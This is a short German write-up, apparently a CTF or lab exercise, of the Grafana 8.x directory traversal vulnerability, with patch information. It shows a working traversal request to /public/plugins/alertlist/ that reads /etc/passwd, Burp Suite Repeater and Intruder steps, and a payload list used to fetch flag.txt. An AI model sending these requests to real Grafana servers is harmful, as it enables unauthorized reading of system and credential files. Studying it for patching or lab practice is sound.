
Grafana-Versionen 8.0.0-beta1 bis 8.3.0 (außer gepatchten Versionen) sind anfällig für Directory Traversal, wodurch der Zugriff auf lokale Dateien ermöglicht wird.
Grafana ist eine Open-Source-Plattform für Monitoring und Observability. Grafana-Versionen 8.0.0-beta1 bis 8.3.0 (außer gepatchten Versionen) sind anfällig für Directory Traversal, wodurch der Zugriff auf lokale Dateien ermöglicht wird. Der anfällige URL-Pfad lautet: <grafana_host_url>/public/plugins//, wobei dies die Plugin-ID für jedes installierte Plugin ist. Grafana Cloud war zu keinem Zeitpunkt anfällig. Benutzern wird empfohlen, auf die gepatchten Versionen 8.0.7, 8.1.8, 8.2.7 oder 8.3.1 zu aktualisieren. Das GitHub Security Advisory enthält weitere Informationen zu anfälligen URL-Pfaden, Gegenmaßnahmen und dem Offenlegungszeitplan.
Verwendung von Burp Suite
Senden Sie GET an den Repeater
GET /public/plugins/alertlist/../../../../../../../../etc/passwd HTTP/1.1
Dann an den Intruder senden GET /public/plugins/alertlist/../../../../../../../../etc/passwd HTTP/1.1
Sniper zum Angriff verwenden Payload von GitHub kopieren: https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Directory%20Traversal
Payload-Verarbeitung Ersetze [{FILE}] durch {flag.txt}